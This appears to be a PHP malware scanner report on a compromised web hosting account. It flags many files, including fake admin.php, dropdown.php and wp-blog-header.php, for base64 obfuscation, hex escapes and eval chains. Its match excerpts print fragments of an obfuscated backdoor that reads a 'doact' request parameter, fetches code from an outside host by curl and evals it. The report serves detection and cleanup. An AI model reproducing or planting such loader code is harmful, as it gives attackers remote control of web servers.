<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/ssl/keys/admin.php

Size: 1.49 kB Created: 2023-11-01 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/keys/dropdown.php

Size: 1.49 kB Created: 2023-06-05 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/keys/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/ssl/private/index.php

Size: 15.44 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Warns: 2 Dangers: 11

Description	Match
Exploit base64_long Line: 8 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 7 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/private/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/ssl/text.php

Size: 1.49 kB Created: 2023-04-24 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/analog/fb.turtlesys.net/admin.php

Size: 1.49 kB Created: 2023-05-05 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/analog/saynotozynga.turtlesys.net/themes.php

Size: 1.49 kB Created: 2023-02-06 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/analog/sequoia.shawndees.com/dropdown.php

Size: 1.49 kB Created: 2023-02-03 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/analog/infinity.shawndees.com/dropdown.php

Size: 1.49 kB Created: 2023-01-30 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/analog/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/awstats/ssl/index.php

Size: 1.49 kB Created: 2023-10-10 04:18:14 Modified: 2024-06-01 04:18:14 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/tmp/awstats/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/cpbandwidth/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/tmp/logaholic/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

